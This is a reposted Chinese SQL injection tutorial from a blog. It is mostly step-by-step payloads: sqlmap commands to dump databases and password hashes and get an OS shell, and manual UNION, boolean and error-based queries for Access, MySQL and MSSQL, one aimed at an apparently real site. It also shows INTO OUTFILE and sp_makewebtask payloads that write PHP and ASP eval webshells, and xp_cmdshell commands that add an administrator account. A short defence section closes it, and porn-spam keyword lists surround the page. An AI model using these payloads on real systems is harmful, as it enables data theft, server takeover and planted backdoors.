日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

2021年6月10日08点53分 SQL注入

發布時間:2023/12/14 数据库 45 豆豆
生活随笔 收集整理的這篇文章主要介紹了 2021年6月10日08点53分 SQL注入 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

1、SQL注入基礎

1.1、SQL注入基礎

SQL注入( SQL Injection ):程序員在編寫代碼的時候,沒有對用戶輸入數據的合法性進行判斷,使應用程序存在安全隱患。用戶可以提交一段數據庫查詢代碼,根據程序返回的結果,獲得某些他想得知的數據或進行數據庫操作SQL注入漏洞的危害是巨大的,常常會導致整個數據庫被“脫褲”。

URLSQL
www.test.com/news.php?id=1FROM news WHERE id=1
www.test.com/news.php?id=1’SELECT * FROM news WHERE id=1’
www.test.com/news.php?id=1 and 1=1SELECT * FROM news WHERE id=1 and 1=1
www.test.com/news.php?id=1 and 1=2SELECT * FROM news WHERE id=1 and 1=2
www.test.com/login.php?user=lisi
www.test.com/login.php?user=lisi’SELECT * FROM users WHERE user=‘lisi’’
www.test.com/login.php?user=lisi’ and ‘1’='1SELECT * FROM users WHERE user=‘lisi’ and ‘1’=‘1’

1.2、SQL注入分類

1.2.1、按變量類型分

  • 數字型注入
  • 字符型注入
  • 搜索型注入

1.2.2、按HTTP提交方式分

  • GET注入
  • POST注入
  • Cookie注入

1.2.3、按注入方式分

  • 報錯注入
  • union注入
  • 盲注基于時間注入

1.2.4、編碼問題

  • 編碼問題的寬字節注入

1.3、SQL注入漏洞的危害

1.3.1、數據庫信息泄漏

數據庫中存放的用戶的隱私信息的泄露。

1.3.2、網頁篡改

通過操作數據庫對特定網頁進行篡改。

1.3.3、網站被掛馬,傳播惡意軟件

修改數據庫一些字段的值,嵌入網馬鏈接,進行掛馬攻擊。

1.3.4、數據庫被惡意操作

數據庫服務器被攻擊,數據庫的系統管理員帳戶被竄改。

1.3.5、服務器被遠程控制,被安裝后門

經由數據庫服務器提供的操作系統支持,讓黑客得以修改或控制操作系統。

1.3.6、操作文件系統

一些類型的數據庫系統能夠讓SQL指令操作文件系統,這使得SQL注入的危害被進一步放大。

2、SQL注入工具

啊D注入工具,明小子綜合注入(僅支持Access和SQL Server,不支持其他數據庫)
Havij,Pangolin(支持Mysql,Oracle)

SQLmap
SQLmap是一款用來檢測與利用SQL注入漏洞的免費開源工具,有一個非常棒的特性,即對檢測與利用的自動化處理(數據庫指紋、訪問底層文件系統、執行命令)。

python sqlmap.py -u "http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1139" python sqlmap.py -u "http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1139" --tables # 列出表 python sqlmap.py -u "http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1139" --columns -T admin # 列出字段 python sqlmap.py -u "http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1139" --dump -T admin # 列出表中內容 python sqlmap.py -u "http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1139" --dump -C id,admin,password -T admin # 列出表中指定字段的內容

2.1、Access手工注入

2.1.1、判斷數據庫類型

and (select count(8) from msysobject)>0 //返回權限不足則為access數據庫

2.1.2、猜表名

and exists (select * from 表名) and (select count(*) from 表名)>0

exists ()的作用是:()里若是返回結果集,就為真。
*是通配符,可代指一個字母或一個單詞,代表任意,即存在數據。select * from admin的意思是:在admin這個表中是否存在數據,若存在數據,exists ()就為真,and前后兩個語句都為真,程序返回正常;若admin表不存在,就是為空集,exists ()為假,程序報錯。因此通過替換“admin”就可以判斷替換的表是否存在。

2.1.3、猜字段名

and exists(select 字段名 from 表名) and (select count(字段名) from 表名)>=0

username是猜解的列名,count()的作用是:返回指定條件的行數,count(username)意思是:返回“username”有幾行,存在的話返回“1”(列名不能有重復),exists ()就為真,程序返回正常,若不存在的話,返回“0”,即為空集,exists ()就為假,程序報錯,改變“username”即可判斷輸入的列名是否存在。

2.1.4、猜字段值的長度

and (select top 1 len(字段名) from 表名)>1 and (select top 1 len(字段名) from 表名)>2 and (select top 1 len(字段名) from 表名)>n

2.1.5、猜字段值

and (select top 1 asc(mid (字段名,1,1)) from 表名)>0 and (select top 1 asc(mid (字段名,1,1)) from 表名)>1 and (select top 1 asc(mid (字段名,1,1)) from 表名)>n and (select top 1 asc(mid (字段名,2,1)) from 表名)>0 and (select top 1 asc(mid (字段名,2,1)) from 表名)>2 and (select top 1 asc(mid (字段名,2,1)) from 表名)>n

要猜解它的內容,就要先知道它里面內容的長度,知道長度后才可以進行逐位猜解。
一般情況下,是用Mid(列名,N,1)來截取列名的第N位字符,再用ASC()函數將截取到的的字符轉換ASCII碼:ASCII碼又叫美國信息標準碼,可以將字母或符號轉換為數字,如a的十進制ASCII碼為97,猜解出來的是ASCII碼的值,還需要對其進行轉換。為了加快猜解速度,可以使用折半法進行猜解。

http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1 http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2 http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select * from 表名) http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 and exists (select 列名 from 表名) http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(列名) from 表名)>0 http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(列名) from 表名)>10 http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(列名) from 表名)>20 http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 len(列名) from 表名)=5 http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,1,1)) from admin)=97 http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,2,1)) from admin)=100 http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,3,1)) from admin)=109 http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,4,1)) from admin)=105 http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,5,1)) from admin)=110 http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(password,1,1)) from admin)=97

2.2、Access高級手工注入(但不是所有的注入點都適合)

2.2.1、判斷數據庫類型

and user>0 //通過內置變量爆數據庫類型 and (select count(*) from msysobjects)>0 //返回權限不足為access數據庫 and (select count(*) from sysobjects)>0 //返回正常則為MSSQL數據庫

2.2.2、猜表名

and exists (select * from 表名) and (select count(*) from 表名)>=0

2.2.3、猜字段名

and exists(select 字段名from 表名) and (select count(字段名) from 表名)>=0

2.2.4、Order by猜字段數目

order by 1 order by 2 order by n

2.2.5、Union select 爆字段內容

and 1=2 union select 1,字段名,字段2,...,n from 表名 http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin http://localhost:81/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin UNION運算要求查詢具有相同數目的字段,但是字段數據類型不必相同

注意,Access使用union聯合查詢,不論前面的查詢語句是否為真,后面的查詢語句都會覆蓋前面的結果,MySQL使用union聯合查詢時,只有前面的查詢語句為假,后面的查詢語句才會覆蓋前面查詢語句的內容,否則不會顯示union后面的查詢語句,也就無法爆出用戶名密碼

2.3、MySQL注入工具,啊D,明小子,Havij,Pangolin,SQLmap

啊D、明小子只支持ACCESS和MSSQL環境的注入點,不支持MYSQL。
Havij、Pangolin支持ACCESS/MSSQL/MYSQL等常見數據庫。
SQLMAP支持市面上基本所有的數據庫。

python sqlmap.py -u "http://localhost/mysql.php?id=1" python sqlmap.py -u "http://localhost/mysql.php id=1" --dbs # 列出存在的數據庫 python sqlmap.py -u "http://localhost/mysql.php?id=1" --current-db # 列出當前正在使用的數據庫,當前頁面正在和哪一個數據庫交互 python sqlmap.py -u "http://localhost/mysql.php?id=1" --tables -D sqlinject # 列出表,-D指定數據庫 python sqlmap.py -u "http://localhost/mysql.php?id=1" --columns -T users -D sqlinject # 列出字段,-T指定表,-D指定數據庫 python sqlmap.py -u "http://localhost/mysql.php?id=1" --dump -T users -D sqlinject # 列出數據庫內容 python sqlmap.py -u "http://localhost/mysql.php?id=1" --dump -C id,username,password -T users -D sqlinject python sqlmap.py -u "http://localhost/mysql.php?id=1" --users # 讀取mysql所有用戶 python sqlmap.py -u "http://localhost/mysql.php?id=1" --current-user # 讀取當前用戶 python sqlmap.py -u "http://localhost/mysql.php?id=1" --is-dba # 判斷當前用戶是否為root賬戶 python sqlmap.py -u "http://localhost/mysql.php?id=1" --passwords # 讀取mysql所有用戶hash密碼 python sqlmap.py -u "http://localhost/mysql.php?id=1" --banner # 讀取mysql具體版本 python sqlmap.py -u "http://localhost/mysql.php?id=1" --os-shell #

2.4、MySQL手工注入

Mysql中不用判斷表是否存在,可以直接order by判斷頁面中的字段數量。

http://192.168.0.104/sqlinject/mysql.php?id=1+order+by+3 http://192.168.0.104/sqlinject/mysql.php?id=1+order+by+4

通過order by 得到頁面字段數量后,即可通過union select確定顯示位。

http://192.168.0.104/sqlinject/mysql.php?id=1+union+select+1,2,3

頁面中不但顯示了正常的內容,也顯示了顯示位信息。如果要避免正常內容對顯示位產生誤導影
響,可通過在union select之前增加and 1=2的方式屏蔽原始的正常內容。

http://192.168.0.104/sqlinject/mysql.php?id=1+and+1=2+union+select+1,2,3

And 1=2的作用,是把union select之前的語句變成FALSE的狀態,即可使union之后的值覆蓋前邊的值。
為了達到這種覆蓋的效果,將URL中傳遞參數的值變為數據庫中一定不會存在的值也可以。
比如:

http://192.168.0.104/sqlinject/mysql.php?id=1000+union+select+1,2,3 http://192.168.0.104/sqlinject/mysql.php?id=-1+union+select+1,2,3

頁面上顯示的1、2、3等數字就是顯示位,可以用于后續注入查詢數據的展示。

得到顯示位后,即可查詢版本、當前用戶、當前數據庫等基本信息。只要是mysql支持的函數,都可以在顯示位處執行。

http://192.168.0.104/sqlinject/mysql.php?id=1+and+1=2+union+select+user(),version(),database()

從MySQL 5開始, 你可以看到多了一個系統數據庫information_schema。
來看一下information_schema庫的表有哪些:information_schema存貯了其他所有數據庫的信息,但它物理上并不存在,在需要的時候,從其他數據庫獲取相應的信息。
如果注入點所使用的mysql賬戶對information_schema有讀取權限的話,攻擊者就可以直接從該庫中得到他想要的一切信息。
更多關于information_schema的詳細信息可以看官網介紹:
http://dev.mysql.com/doc/refman/5.1/zh/information-schema.html

2.4.1、查庫語法

select concat(GROUP_CONCAT(DISTINCT table_schema)) from information_schema.columns;

這條SQL語句的意思,就是從information_schema庫的COLUMNS表中查詢出所有TABLE_SCHEMA列的內容并過濾重復。
查庫語法在SQL注入點中的示例:

http://www.cmiqc.com/content/info.php?id=253+and+1=2+union+select+1,2,3,concat(GROUP_CONCAT(DISTINCT+table_schema)),5,6,7,8+from+information_schema.columns

一條注入指令,就爆出了當前mysql中所有的庫名列表。這是因為在COLUMNS表中的TABLE_SCHEMA列中存儲了mysql中所有的非空庫名。
實際上在很多其他的表中也存在TABLE_SCHEMA列,這些列中也存儲了mysql中所有的非空庫名,比如information_schema.SCHEMATA表。
SQL注入語法:

http://192.168.0.104/sqlinject/mysql.php?id=1+and+1=2+union+select+concat(group_concat(schema_name)),2,3+from+information_schema.SCHEMATA

還有information_schema.TABLES表也可以用于查庫。SQL注入語法:

http://192.168.0.104/sqlinject/mysql.php?id=1+and+1=2+union+select+concat(group_concat(DISTINCT table_schema)),2,3+from+information_schema.TABLES

2.4.2、查表

可以從information_schema.TABLES和information_schema.COLUMNS這2個表中查詢各個庫中的所有表名。
SQL注入語法:

http://192.168.0.104/sqlinject/mysql.php?id=1+and+1=2+union+select+concat(group_concat(DISTINCT table_name)),2,3+from+information_schema.TABLES+where+table_schema='xssme' http://192.168.0.104/sqlinject/mysql.php?id=1+and+1=2+union+select+concat(group_concat(DISTINCTtable_name)),2,3+from+information_schema.TABLES+where+table_schema=0x7873736D65

2.4.3、查列

可以從information_schema.COLUMNS表中查詢出每個庫中每個表中所包含的列名。
SQL注入語法:

http://192.168.0.104/sqlinject/mysql.php?id=1+and+1=2+union+select+concat(group_concat(DISTINCT column_name)),2,3+from+information_schema.COLUMNS+where+table_name= 'oc_user' http://192.168.0.104/sqlinject/mysql.php?id=1+and+1=2+union+select+concat(group_concat(DISTINCT column_name)),2,3+from+information_schema.COLUMNS+where+table_name=0x6F635F75736572

3、常用變量與函數

3.1、MySQL注入-常用變量與函數

在mysql中執行SHOW VARIABLES;就可以返回當前所有可用的變量和變量的值

變量功能說明
@@version_compile_os返回操作系統類型
@@Datadir返回數據存儲目錄的路徑
@@Basedir返回mysql安裝目錄的路徑
@@log_error返回mysql錯誤日志的路徑
@@plugin_dir返回mysql的插件目錄的路徑
@@tmpdir返回mysql存儲臨時文件的目錄路徑
@@skip_networking返回mysql是否只允許本地連接的布爾值,1為是,0為否
函數功能說明
version()返回數據庫版本
database()返回當前庫名
user()返回當前登錄用戶,可用SYSTEM_USER()、SESSION_USER()、CURRENT_USER()替代
concat()用于連接一個或者多個字符串,注入中一般用于在一個位置顯示多個內容
GROUP_CONCAT()一次性返回一列的全部內容
load_file()讀取文件
into outfile()導出文件,導出過程中會轉義換行符并在行末端寫入新行
into dumpfile()導出文件,不對數據做任何修改,但只能導出一行數據

3.2、MySQL注入-Concat()和concat_ws()函數

Concat()函數用于連接一個或者多個字符串,注入中一般用于在一個位置顯示多個內容。當注入點的顯示位只有一個,但又需要同時顯示多條內容時,就需要使用concat()函數。
語法:

select concat(user(),',',database(),',',version()); select concat(user(),0x2c,database(),0x2c,version());

SQL注入語法:

http://192.168.0.104/sqlinject/mysql.php?id=1+and+1=2+union+select+concat(user(),0x2c,database(),0x2c,version()),2,3

Concat()函數的語法不會主動為每個被包含的內容中間加上分隔符號以更便于閱讀,所以需要手動
在每兩個被包含內容中間增加分隔符號。
Concat_ws()函數可以指定一個分隔符號,從而幫助我們在被包含的兩個內容中間自動添加該分隔
符號,比如:

select concat_ws(0x2c,user(),database(),version());

SQL注入代碼:

http://192.168.0.104/sqlinject/mysql.php?id=1+and+1=2+union+select+concat_ws(0x2c,user(),database(),version()),2,3

4、MySQL高級注入-Load_file和into outfile

4.1、利用條件

  • Mysql賬戶具備file權限
  • Mysql版本為3.23以上,否則低版本的mysql沒有into
    outfile和dumpfile函數,無法導出文件,官方說明見:http://dev.mysql.com/doc/refman/4.1/en/select.html
  • 被導出的目錄可寫可執行

4.2、Mysql賬戶的file權限是什么?

Mysql安裝之后會存在一個名為mysql的默認數據庫,這個庫中存儲了mysql的大部分配置信息。
每個mysql賬戶的權限控制信息存儲在mysql.user表中,File_priv確定用戶是否可以執行SELECT INTO OUTFILE和LOAD DATA INFILE命令。對于滲透測試來說,經常需要關注的字段是mysql.user. File_priv,這個字段的值是一個布爾值,它決定了該用戶是否具備操作磁盤上的文件的權限。比如如果mysql.user. File_priv中對mysql賬戶root的定義值是Y,那么root就有權讀寫服務器磁盤上的文件。反之,如果該值為N,則root無權讀寫服務器磁盤上的文件。
所以,在注入時,不能看到是root就判斷一定可以利用into outfile/loadfile函數。能否利用into outfile/loadfile/into dumpfile這種文件操作函數與賬戶名無關,與mysql.user. File_priv字段中對該賬戶的權限分配有關。
可以使用以下SQL語句查詢用戶是否具備File_priv權限:

select HOST,USER,FILE_PRIV from mysql.user;

在當前賬戶沒有文件操作權限時執行into outfile/loadfile/into dumpfile等文件操作函數,會提示Access denied訪問拒絕:
如果要禁用某個mysql賬戶的文件操作權限,則構造以下SQL語句執行即可:

UPDATE mysql.user SET File_priv = 'N' WHERE User='fan'; FLUSH PRIVILEGES;

如果要禁用所有賬戶的文件操作權限,則執行:

UPDATE mysql.user SET File_priv = 'N'; FLUSH PRIVILEGES;

切記在修改完用戶權限后,一定要執行“FLUSH PRIVILEGES;”語句重載mysql用戶授權表或重啟mysql服務,否則mysql依然使用的是緩存在內存中的權限配置。

4.2.3、Load_file讀文件

因為mysql中字符串可以用16進制表示,所以要加載的文件的路徑及文件名可以轉換為16進制后執行,這樣可以繞過GPC的限制。
前提條件:

  • 文件必須在服務器上。
  • LOAD_FILE()函數操作文件的當前目錄是@@datadir 。
  • MySQL用戶必須擁有對此文件讀取的權限。
  • 文件大小必須小于 max_allowed_packet。
  • @@max_allowed_packet的默認大小是1047552 字節。

示例:

select load_file('C:\\boot.ini');

可以將文件路徑轉換為16進制再讀取:

select load_file(0x433A2F7068705F777777726F6F742F31375F30395F32342E6C6F67);

在注入點的利用:

http://192.168.213.129/mysql.php?id=1 and 1=2 union select 1,2,load_file('C:\\boot.ini'); http://192.168.213.129/mysql.php?id=1 and 1=2 union select 1,2,load_file(0xhex);

4.2.4、into outfile寫文件

前提條件:

  • INTO OUTFILE 不可以覆蓋已存在的文件。
  • INTO OUTFILE 必須是最后一個查詢。
  • 引號是必須的,因為沒有辦法可以編碼路徑名。

SQL語句:

select 0x3C3F70687020406576616C28245F504F53545B2770617373275D293B3F3E into outfile 'C:\\PHPSTUDY-002\\WWW\\caidao.php'

在注入點的利用:

http://192.168.213.129/mysql.php?id=1 and 1=2 union select 1,2,0x3C3F70687020406576616C28245F504F53545B2770617373275D293B3F3E into outfile 'C:\\PHPSTUDY-002\\WWW\\caidao2.php'

4.2.5、secure-file-priv參數

secure-file-priv參數是用來限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()傳到哪個指定目錄的。

  • 當secure_file_priv的值為null ,表示限制mysqld 不允許導入|導出
  • 當secure_file_priv的值為/tmp/ ,表示限制mysqld 的導入|導出只能發生在/tmp/目錄下
  • 當secure_file_priv的值沒有具體值時,表示不對mysqld 的導入|導出做限制

如何查看secure-file-priv參數的值:

show global variables like '%secure%';

此開關默認為NULL,即不允許導入導出。
官方說明:
https://dev.mysql.com/doc/refman/5.7/en/server-system-variables.html#sysvar_secure_file_ priv
https://dev.mysql.com/doc/refman/8.0/en/server-system-variables.html#sysvar_secure_file_ priv

5、MSSQL注入

python sqlmap.py -u "http://localhost:83/looknews.asp?id=20" python sqlmap.py -u "http://localhost:83/looknews.asp?id=20" --dbs python sqlmap.py -u "http://localhost:83/looknews.asp?id=20" --current-db python sqlmap.py -u "http://localhost:83/looknews.asp?id=20" --tables -D db_shop python sqlmap.py -u "http://localhost:83/looknews.asp?id=20" --columns -T users -D db_shop(讀不出列,需手工) python sqlmap.py -u "http://localhost:83/looknews.asp?id=20" --dump -T users -D db_shop(讀不出列,需手工) python sqlmap.py -u "http://localhost:83/looknews.asp?id=20" --dump -C id,username,password -T users -D db_shop(讀不出列,需手工)

5.1、基本注入

單引號判斷注入
判斷數據庫類型

and user>0 //通過內置變量爆數據庫類型 and (select count(*) from sysobjects)>0 //返回正常則為MSSQL數據庫

user是SQLServer的一個內置變量,它的值是當前連接的用戶名,類型為nvarchar。拿一個nvarchar的值跟int的數0比較,系統會先試圖將nvarchar的值轉成int型,當然,轉的過程中肯定會出錯,SQLServer的出錯提示是:將nvarchar值 ”abc” 轉換數據類型為 int 的列時發生語法錯誤,abc正是變量user的值,這樣,不廢吹灰之力就拿到了數據庫的用戶名。
如果是sa登錄,提示是將”dbo”轉換成int的列發生錯誤,而不是”sa”。
在本文演示的案例中,提示就是dbo,那么說明當前注入點的權限是sa。
判斷版本:and (select @@version)>0;--

判斷當前數據庫:

and db_name()>0;-- 獲取機器名: and (select @@servername)>0;-- 判斷是否為sa權限: and (select is_member('db_owner'))>0;-- 判斷是否有master庫讀取權限: and (select HAS_DBACCESS('master'))>0;-- 有master庫的讀取權限,就可以遍歷數據庫中存在的所庫的名字了。

5.2、爆庫

and (select name from master.dbo.sysdatabases where dbid=1)>0;-- and (select name from master.dbo.sysdatabases where dbid=2)>0;-- 也就是不斷變化dbid的值,來遍歷數據庫中所有的庫名,其默認數據庫的 id 號從 6 以后為

用戶定義數據庫。
當dbid的值足夠大時,那么數據庫中肯定沒有這么多的庫,這時and語句的執行結果就會是false:
ADODB.Field 錯誤 '80020009’BOF 或 EOF 中有一個是“真”,或者當前的記錄已被刪除,所需的操作要求一個當前的記錄。
/shop/looknews.asp,行 0

5.3、爆表

http://localhost:83/looknews.asp?id=20 and (select top 1 name from sysobjects where xtype='u' and status>0 )>0;-- http://localhost:83/looknews.asp?id=20 and (select top 1 name from sysobjects where xtype='u' and status>0 and name not in('bigclass'))>0;-- http://localhost:83/looknews.asp?id=20 and (select top 1 name from sysobjects where xtype='u' and status>0 and name not in('bigclass','admin'))>0;-- http://localhost:83/looknews.asp?id=20 and (select top 1 name from sysobjects where xtype='u' and status>0 and name not in('bigclass','admin','class'))>0;-- http://localhost:83/looknews.asp?id=20 and (select top 1 name from sysobjects where xtype='u' and status>0 and name not in('bigclass','admin','class','D99_CMD'))>0;--

5.4、暴列

http://localhost:83/looknews.asp?id=20 and (Select Top 1 col_name(object_id('admin'),1) from sysobjects)>0;-- http://localhost:83/looknews.asp?id=20 and (Select Top 1 col_name(object_id('admin'),2) from sysobjects)>0;-- http://localhost:83/looknews.asp?id=20 and (Select Top 1 col_name(object_id('admin'),3) from sysobjects)>0;--

5.5、爆內容

只要將之前得到的表名列名進行組合查詢,形成完整的SQL查詢語句即可進行正常的查詢。

http://localhost:83/looknews.asp?id=20 and (select top 1 username from admin)>0;-- http://localhost:83/looknews.asp?id=20 and (select top 1 pass from admin)>0;--

按照上述的手法可以得到第一條數據,不過想得到第2條或第N條數據的話,就稍微有點麻煩。

取得第二條數據:

http://localhost:83/looknews.asp?id=20 and (select top 1 username from admin where username not in (select top 1 username from admin))>0;-- http://localhost:83/looknews.asp?id=20 and (select top 1 pass from admin where pass not in (select top 1 pass from admin))>0;--

取得第三條數據:

http://localhost:83/looknews.asp?id=20 and (select top 1 username from admin where username not in (select top 2 username from admin))>0;-- http://localhost:83/looknews.asp?id=20 and (select top 1 pass from admin where pass not in (select top 2 pass from admin))>0;--

MSSQL總結

爆庫、表、字段、內容分別是 http://192.168.1.21/looknews.asp?id=20 and (select name from master.dbo.syasdatabases where dbid=1)>0; -- http://192.168.1.21/looknews.asp?id=20 and (select top 1 name from sysobjects where xtype='u')>0; -- http://192.168.1.21/looknews.asp?id=20 and (select col_name(object_id('admin'),1))>0; -- http://192.168.1.21/looknews.asp?id=20 and (select top 1 username from admin)>0; --

6、SQL注入

6.1、MSSQL高級注入-存儲過程

存儲過程:存儲過程為數據庫提供了強大的功能,其類似UDF,在MSSQL中xp_cmdshell可謂臭名昭著了。MSSQL強大的存儲過程也為黑客提供了便利,在相應的權限下,攻擊者可以利用不同的存儲過程執行不同的高級功能,如增加MSSQL數據庫用戶,枚舉文件目錄等等。而這些系統存儲過程中要數xp_cmdshell最強大,通過該存儲過程可以在數據庫服務器中執行任意系統命令。MSSQL2005,2008等之后版本的MSSQL都分別對系統存儲過程做了權限控制以防止被濫用。
擴展存儲的本質是編譯了的動態鏈接庫(DLLs),它用SQL-Server指定的調用方式去運行接口函數。他們允許SQL-Server程序 擁有了和c/c++一樣的功能,是個非常有用的特性。SQL-Server內置了大量的擴展存儲,而且有各種各樣的函數比如發送郵件和更改注冊表。

6.2、MSSQL高級注入-XP_CMDSHELL

判斷XP_CMDSHELL是否存在

and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name ='xp_cmdshell');-- 如果存在,會返回正常頁面。

如果不存在,會提示:
ADODB.Field 錯誤 ‘800a0bcd’
BOF 或 EOF 中有一個是“真”,或者當前的記錄已被刪除,所需的操作要求一個當前的記錄。xp_cmdshell是一個內置的擴展存儲,它允許執行任意的命令行程序。

http://localhost:83/shop/looknews.asp?id=20;Exec master.dbo.xp_cmdshell 'net user cmdshell cmdshell /add';-- http://localhost:83/looknews.asp?id=20;exec master.dbo.xp_cmdshell 'net localgroup administrators cmdshell /add';--

6.3、MSSQL高級注入-通過sp_makewebtask直接獲得webshell

如果未啟用Web Assistant Procedures,那么MSSQL會提示錯誤:
SQLServer 阻止了對組件 ‘WebAssistant Procedures’ 的 過程’sys.xp_makewebtask’ 的訪問,因為此組件已作為此服務器安全配置的一部分而被關閉。

開啟:exec sp_configure 'Web AssistantProcedures', 1; RECONFIGURE 寫入webshell:exec sp_makewebtask 'c:\1.asp','select''<%execute(request("ruo"))%>'' ' SQL注入: http://localhost:83/looknews.asp?id=20;exec sp_makewebtask 'C:\Inetpub\wwwroot\asp_mssql\test.asp','select''<%25eval request("pass")%25>'''; --

6.4、SQL注入防御

6.4.1、輸入驗證:驗證應用接收到的輸入時一種可用的功能強大的控制手段。

  • 黑名單驗證:黑名單驗證的常用方法是使用正則表達式。

  • 白名單驗證:

    驗證數據是否為白名單范圍中的內容。
    數據類型:字符、數字等。
    數據大小:字符串長度是否正確,數字的大小和精度是否正確。
    數據范圍:如果是數字型,是否位于該數據類型期望的數字范圍。
    數據內容:數據是否屬于期望的數據類型,如手機號碼,它是否滿足期望的值。

6.4.2、使用參數化語句

PHP包含很多用于訪問數據庫的框架。訪問MySQL數據庫的mysqli包,PEAR::MDB2包(它替代了流行的PEAR::DB包)以及新的PHP數據對象(PDO)框架,他們均為使用參數化語句提供便利。

6.4.3、使用存儲過程

將應用設計成專門使用存儲過程來訪問數據庫是一種可以防止或減輕SQL注入影響的技術。存儲過程是保存在數據庫匯總的程序。根據數據庫的不同,可以使用很多不同語言及其變體來編寫存儲過程。

總結

以上是生活随笔為你收集整理的2021年6月10日08点53分 SQL注入的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

999久久久免费精品国产 | 国内精品中文字幕 | 91色网址| 色视频在线免费观看 | 五月天六月婷婷 | 麻豆国产精品永久免费视频 | 国产亚洲免费观看 | 99久久www免费 | 日韩在线观看精品 | 免费色婷婷 | 国产黄| 91爱看片| 天天操天天操天天爽 | 天天玩天天操天天射 | 国产高清网站 | 国产精品毛片完整版 | 免费三级黄色片 | 色偷偷97| 欧美在线一级片 | 中文字幕中文字幕中文字幕 | 午夜18视频在线观看 | 日韩一区二区三免费高清在线观看 | 亚洲精品视频在线观看视频 | www.日本色| 视频一区二区三区视频 | 日韩精品一区二区在线视频 | 国产高清视频在线 | 99亚洲国产 | 欧美一区免费在线观看 | 精品福利在线视频 | 久久综合免费视频影院 | 久久国产视频网站 | 午夜精品视频一区 | 久久国产片 | 人人模人人爽 | 久草网站| www.国产精品 | 91视频观看免费 | 日韩亚洲在线视频 | 精品毛片一区二区免费看 | 日韩理论片 | 久久综合久久88 | 精品福利视频在线 | av 一区 二区 久久 | 久久66热这里只有精品 | 91久久国产精品 | 成人a级黄色片 | 中文字幕在线观看一区二区三区 | 福利一区二区在线 | 久精品视频在线观看 | 国产aa免费视频 | 亚洲三级国产 | 91黄色在线视频 | 久久超碰网 | 综合伊人av | 六月色婷 | 91插插影库| 99精品在线免费视频 | 91污视频在线 | 精品无人国产偷自产在线 | 久久久久久久久爱 | 天天色天天骑天天射 | 91毛片在线 | 欧美福利视频一区 | 国产一二三在线视频 | 日日日爽爽爽 | 丁香综合| 在线观看黄色免费视频 | 亚洲国产久 | 一二三区视频在线 | 国产精品久久久久久久久久免费 | 99精品国自产在线 | 成人午夜电影在线观看 | 国产精品毛片完整版 | 亚洲视频久久久久 | 一级α片免费看 | 五月婷婷综合激情网 | 国产特级毛片aaaaaaa高清 | 啪啪肉肉污av国网站 | 中文字幕在线网 | 波多野结衣在线中文字幕 | 韩国在线一区二区 | 国产在线观看污片 | 欧美日韩3p | 日本少妇久久久 | 国产精品免费一区二区三区在线观看 | 久精品视频在线观看 | 日韩在线网址 | 日韩av黄 | 在线91精品 | 国产一区在线观看视频 | 丁香综合| 亚洲精品ww| 国产一级电影免费观看 | 久久精品1区 | 久久av电影| 九九精品在线观看 | 久久人网| 国产精品三级视频 | a黄色 | 午夜婷婷在线观看 | 最新中文字幕在线播放 | 韩国三级在线一区 | av中文字幕在线观看网站 | 伊人国产在线播放 | 日韩在线 一区二区 | 欧美做受高潮电影o | 99情趣网视频 | 日韩欧美在线高清 | www·22com天天操 | 美女视频黄是免费的 | 国产精品99久久久久久小说 | 超碰97免费观看 | 六月婷操 | 激情久久婷婷 | 99热精品在线 | 不卡av电影在线 | 久久久久五月 | 久草精品视频在线观看 | 狠狠色狠狠色合久久伊人 | 国产精品资源在线 | 久久精彩视频 | 欧美成人h版电影 | 精品福利av| 亚洲 综合 精品 | 国产黄色高清 | 中文字幕在线视频一区二区 | 91精品爽啪蜜夜国产在线播放 | 免费91麻豆精品国产自产在线观看 | 91人人爱 | 国产成人精品一区一区一区 | 久久久激情网 | 欧美午夜视频在线 | 国产精品精品国产 | 久久久久国产一区二区三区 | 久久精品网址 | 欧美另类人妖 | 国产精品亚洲综合久久 | 日韩精品在线观看视频 | 五月亚洲综合 | 婷婷激情综合 | 久久影院精品 | 最新中文字幕在线资源 | 亚洲美女精品 | 日韩有码在线观看视频 | 在线国产视频 | 啪啪激情网 | 五月婷婷播播 | 免费不卡中文字幕视频 | 欧美韩日精品 | 九九热国产视频 | 欧美午夜性 | 亚洲人成人99网站 | 欧美在线视频精品 | 午夜av不卡 | 久久久精品欧美一区二区免费 | 91成人免费看 | 99视频在线精品 | 国产香蕉在线 | 正在播放 久久 | 欧美大片www | 